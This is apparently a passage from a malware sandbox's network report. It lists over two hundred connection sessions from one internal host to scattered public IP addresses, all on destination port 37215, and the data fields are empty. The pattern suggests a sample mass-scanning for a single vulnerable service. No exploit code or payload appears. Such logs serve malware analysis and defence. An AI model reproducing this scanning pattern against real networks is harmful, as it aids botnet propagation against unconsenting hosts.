                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11595192.168.2.1335790180.5.175.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11596192.168.2.135592241.121.94.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11597192.168.2.1333682157.127.158.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11598192.168.2.1337634197.181.162.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11599192.168.2.1350638157.147.55.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11600192.168.2.135696241.171.42.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11601192.168.2.1350918157.24.165.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11602192.168.2.1352150197.227.21.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11603192.168.2.134392441.212.179.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11604192.168.2.1338080197.40.42.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11605192.168.2.1347710197.150.10.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11606192.168.2.1341238207.232.104.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11607192.168.2.1355764126.28.83.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11608192.168.2.134990054.230.146.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11609192.168.2.1354986157.144.76.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11610192.168.2.1332862131.64.74.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11611192.168.2.1352200157.71.117.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11612192.168.2.1351146197.45.209.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11613192.168.2.133345041.255.251.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11614192.168.2.134815065.74.131.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11615192.168.2.1340748197.95.229.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11616192.168.2.1354900157.55.208.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11617192.168.2.133993241.160.199.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11618192.168.2.133571241.246.9.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11619192.168.2.134305841.51.228.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11620192.168.2.134459241.81.213.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11621192.168.2.135047441.161.15.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11622192.168.2.1338476157.209.0.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11623192.168.2.1347352197.193.179.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11624192.168.2.134215872.127.200.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11625192.168.2.1333412157.33.211.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11626192.168.2.133496441.55.211.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11627192.168.2.1356128197.75.213.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11628192.168.2.133329841.62.239.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11629192.168.2.1348538197.173.163.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11630192.168.2.134859841.135.118.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11631192.168.2.133670641.151.156.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11632192.168.2.1339228197.53.252.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11633192.168.2.1338398197.251.54.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11634192.168.2.1345324157.33.46.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11635192.168.2.1338574197.12.55.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11636192.168.2.1356834157.114.161.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11637192.168.2.1347238157.224.57.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11638192.168.2.1359218199.198.40.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11639192.168.2.1353710197.174.109.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11640192.168.2.133988441.210.121.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11641192.168.2.1344694157.140.68.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11642192.168.2.1348914157.240.235.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11643192.168.2.1352118197.68.227.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11644192.168.2.1360034197.205.217.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11645192.168.2.1333662157.53.70.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11646192.168.2.1350252197.61.61.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11647192.168.2.134799441.9.124.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11648192.168.2.1340744121.7.162.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11649192.168.2.1340584157.202.95.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11650192.168.2.1339968161.105.145.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11651192.168.2.1348834157.108.38.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11652192.168.2.1349042176.106.114.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11653192.168.2.1354248157.87.42.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11654192.168.2.1339638157.250.44.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11655192.168.2.134649441.231.173.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11656192.168.2.1358622197.222.106.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11657192.168.2.1347304184.215.154.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11658192.168.2.1343212157.107.241.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11659192.168.2.1345920157.44.161.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11660192.168.2.1357346143.70.27.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11661192.168.2.1349042197.149.41.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11662192.168.2.133832241.255.86.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11663192.168.2.135798241.51.133.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11664192.168.2.1337530197.211.186.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11665192.168.2.1346992157.238.203.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11666192.168.2.1339524157.179.58.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11667192.168.2.1345364217.35.141.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11668192.168.2.1343050157.186.246.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11669192.168.2.1355572157.170.171.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11670192.168.2.1347246157.213.247.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11671192.168.2.134100441.138.239.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11672192.168.2.1342846157.168.8.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11673192.168.2.1334064157.24.251.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11674192.168.2.135208841.1.71.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11675192.168.2.134146041.138.131.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11676192.168.2.1357836157.8.178.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11677192.168.2.1353298157.218.58.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11678192.168.2.1357832211.76.203.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11679192.168.2.1356670197.227.161.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11680192.168.2.1355358197.68.98.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11681192.168.2.135770441.152.81.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11682192.168.2.1341692197.246.172.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11683192.168.2.1334788216.208.121.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11684192.168.2.135810861.82.87.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11685192.168.2.1344908157.35.173.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11686192.168.2.134053641.245.238.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11687192.168.2.133306697.231.205.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11688192.168.2.1349752197.176.222.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11689192.168.2.1337012157.20.67.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11690192.168.2.135938841.68.236.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11691192.168.2.1341554210.247.126.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11692192.168.2.1353620151.32.42.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11693192.168.2.1340742197.30.220.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11694192.168.2.133940641.77.2.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11695192.168.2.135294841.15.79.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11696192.168.2.134626441.102.26.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11697192.168.2.1341206157.37.1.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11698192.168.2.134031841.113.209.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11699192.168.2.1334026133.215.230.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11700192.168.2.1336084137.7.12.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11701192.168.2.1357898186.8.191.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11702192.168.2.1349494157.74.115.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11703192.168.2.1347958142.213.224.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11704192.168.2.1338984157.224.185.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11705192.168.2.133940841.154.20.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11706192.168.2.1344492144.211.86.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11707192.168.2.1336306197.23.57.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11708192.168.2.134932250.216.46.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11709192.168.2.1358026157.58.45.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11710192.168.2.133408841.81.46.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11711192.168.2.1341002197.182.7.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11712192.168.2.1335992197.165.14.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11713192.168.2.1348106157.143.183.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11714192.168.2.1353568197.65.215.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11715192.168.2.1346168197.151.157.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11716192.168.2.1356628141.196.252.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11717192.168.2.135531241.75.213.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11718192.168.2.1354806184.78.249.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11719192.168.2.1340648102.231.222.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11720192.168.2.1357882157.143.245.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11721192.168.2.1336248197.226.69.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11722192.168.2.135994841.165.252.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11723192.168.2.135222241.39.96.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11724192.168.2.1356138157.194.125.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11725192.168.2.1333756197.34.38.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11726192.168.2.1360080157.19.223.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11727192.168.2.1342990125.107.222.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11728192.168.2.1358412197.66.254.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11729192.168.2.1350536157.104.34.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11730192.168.2.1336114197.185.114.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11731192.168.2.134888641.150.230.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11732192.168.2.135212241.123.247.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11733192.168.2.134437041.138.99.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11734192.168.2.1334070157.80.162.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11735192.168.2.1359186205.187.10.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11736192.168.2.134383248.186.204.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11737192.168.2.1346692211.244.154.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11738192.168.2.135779412.211.79.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11739192.168.2.134209241.160.231.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11740192.168.2.1337424157.101.124.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11741192.168.2.1333976155.163.61.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11742192.168.2.1340928197.200.48.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11743192.168.2.1346780157.42.152.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11744192.168.2.1339942157.99.217.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11745192.168.2.1347720157.84.245.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11746192.168.2.1355508157.205.116.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11747192.168.2.1342560218.34.189.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11748192.168.2.133853441.241.29.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11749192.168.2.134278041.27.187.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11750192.168.2.1345476157.54.157.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11751192.168.2.1348758197.54.71.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11752192.168.2.134022841.242.191.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11753192.168.2.133637441.185.150.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11754192.168.2.135220041.99.67.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11755192.168.2.134453841.237.39.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11756192.168.2.1344510153.14.76.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11757192.168.2.1351072140.75.195.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11758192.168.2.1344692197.165.251.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11759192.168.2.134555246.115.126.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11760192.168.2.134218841.174.15.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11761192.168.2.134904841.246.215.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11762192.168.2.134398441.243.207.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11763192.168.2.134966641.171.60.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11764192.168.2.1337910197.65.209.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11765192.168.2.133375258.133.237.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11766192.168.2.1358614197.44.4.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11767192.168.2.1346332157.192.181.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11768192.168.2.1354954197.224.88.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11769192.168.2.134942641.120.83.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11770192.168.2.134230296.80.146.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11771192.168.2.1340462197.193.217.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11772192.168.2.135174241.179.32.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11773192.168.2.1346284157.110.23.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11774192.168.2.134946441.97.246.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11775192.168.2.1360036157.24.107.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11776192.168.2.136073041.185.113.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11777192.168.2.133975212.66.96.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11778192.168.2.133678641.213.6.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11779192.168.2.1343208173.204.152.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11780192.168.2.1335582181.71.248.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11781192.168.2.1334646220.53.161.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11782192.168.2.1356522197.23.123.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11783192.168.2.1338590197.128.130.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11784192.168.2.133567847.4.130.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11785192.168.2.1357514157.83.19.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11786192.168.2.1354934157.17.111.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11787192.168.2.134215441.56.91.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11788192.168.2.1349990157.244.236.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11789192.168.2.135791241.205.147.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11790192.168.2.134165441.38.127.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11791192.168.2.1342300157.93.44.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11792192.168.2.1344726197.251.18.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11793192.168.2.1333832125.182.136.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11794192.168.2.1343496197.133.223.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11795192.168.2.1338992197.2.114.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11796192.168.2.1345140157.37.186.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11797192.168.2.1334572197.149.31.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11798192.168.2.134339031.57.228.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11799192.168.2.1340132186.161.92.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11800192.168.2.133882441.166.44.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11801192.168.2.134453041.119.118.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11802192.168.2.1338842196.142.12.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11803192.168.2.1336608157.4.227.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
